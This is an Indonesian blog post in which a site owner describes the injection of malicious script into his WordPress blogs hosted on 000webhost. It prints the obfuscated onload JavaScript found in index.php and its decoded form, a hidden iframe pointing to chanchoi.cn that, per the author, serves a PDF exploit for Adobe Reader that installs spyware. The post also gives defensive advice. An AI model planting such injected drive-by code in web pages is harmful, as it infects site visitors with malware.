Attack yang dilakukan chanchoi.cn

attack yang dilakukan oleh web chanchoi.cn juga saya alami seminggu yang lalu pada salah satu blog saya http://dafiex.site88.net. Pertama kali terpikirkan kalau bugs terdapat pada blog saya yang menggunakan machine wordpress tersebut, sehingga attacker berhasil melakukan injeksi javascript pada halaman index.php yang merupakan index dari blog bermachine WP yang saya gunakan. Tetapi pendapat saya ternyata salah, korban attacker adalah sebagian besar merupakan member dari 000webhost.com dan dapat di simpulkan bahwa kebocoran terdapat pada system 000webhost. Pendapat saya ini semakin diperkuat dengan kejadian yang sama pada domain saya yang berbeda pada hosting 000webhost, script injection juga terdapat menempel pada halaman index. Sempat panik juga, walaupun blog tersebut tidak ada apa-apanya.. :D dan akhirnya saya putuskan untuk melakukan upgrade pada blog tersebut dengan versi terbaru dari wordpress yaitu versi 2.6. Dibawah ini adalah script yang di gunakan attacker tersebut dalam code yang masih terencrypt :

<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?<html><body onload="function a0(s){b='';for(i=0;i<s.length;i+=4>>1)b+=s.charAt(i);return b;}document.write(a0('\074u\x64n\151k\x76n\040o\x73w\164n\x79 \154o\x65b\075f\x22u\166s\x69c\163a\x69t\142i\x69o\154n\x69u\164n\x79k\072n\x68o\151w\x64n\144 \x65o\156b\x22f\076u\x3cs\151c\x66a\162t\x61i\155o\x65n\040u\x73n\162k\x63n\075o\x22w\150n\x74 \164o\x70b\072f\x2fu\057s\x63c\150a\x61t\156i\x63o\150n\x6fu\151n\x2ek\143n\x6eo\057w\x69n\156 \x64o\145b\x78f\056u\x70s\150c\x70a\042t\x20i\166o\x69n\163u\x69n\142k\x69n\154o\x69w\164n\x79 \072o\x68b\151f\x64u\144s\x65c\156a\x20t\167i\x69o\144n\x74u\150n\x3dk\061n\x30o\060w\x20n\150 \x65o\151b\x67f\150u\x74s\075c\x38a\060t\x3ei\074o\x2fn\151u\x66n\162k\x61n\155o\x65w\076n\x3c \057o\x64b\151f\x76u\076s'));"</body></html>>

hasil decode :

<div style="visibility:hidden"><iframe src="http://chanchoi.cn/index.php" visibility:hidden width=100 height=80></iframe></div>

kejadian ini juga di alami oleh salah satu rekan saya di nangkacomm, disebutkan juga hal serupa di forum 000webhost dan menurut informasi dari forum tersebut admin 000webhost telah melakukan blocking terhadap web chanchoi.net. Hari ini di sebutkan bahwa system 000webhost sudah kembali bekerja dengan normal pada halaman login member, yah semoga saja patching sudah dilakukan dengan benar :) .Mengenai efek dari script yang telah mereka injeksi pada system adalah membuat sebuah frame hidden yang mengarah pada sebuah document PDF dimana didalam file PDF tersebut terdapat script attack untuk adobe acrobat reader yang pada akhirnya system operasi kita (windows only) akan melakukan download program dari mereka, program ini biasa di sebut spyware/maleware. Untuk antisipasinya, antivirus norton sudah mengenali spyware ini seperti yang mereka kabarkan pada halaman "https://safeweb.norton.com/report/show?name=chanchoi.cn". dan juga sebaiknya anda update acrobat reader anda dengan versi terbarunya untuk menghindari hal yang tidak diinginkan. Untuk penggunaan browser sendiri sudah saya coba pada firefox versi 3.0.4 dan sudah dapat mendeteksi situs chanchoi sebagai situs attack dengan adanya pesan alert "The site at chanchoi.cn has been reported as an attack site and has been blocked based on your security preferences", tapi security dari sisi browser tidaklah 100% aman karena browser hanya mengenali url dari situs saja! sementara file attack tersebut bisa saja dipindahkan ke domain yang berbeda.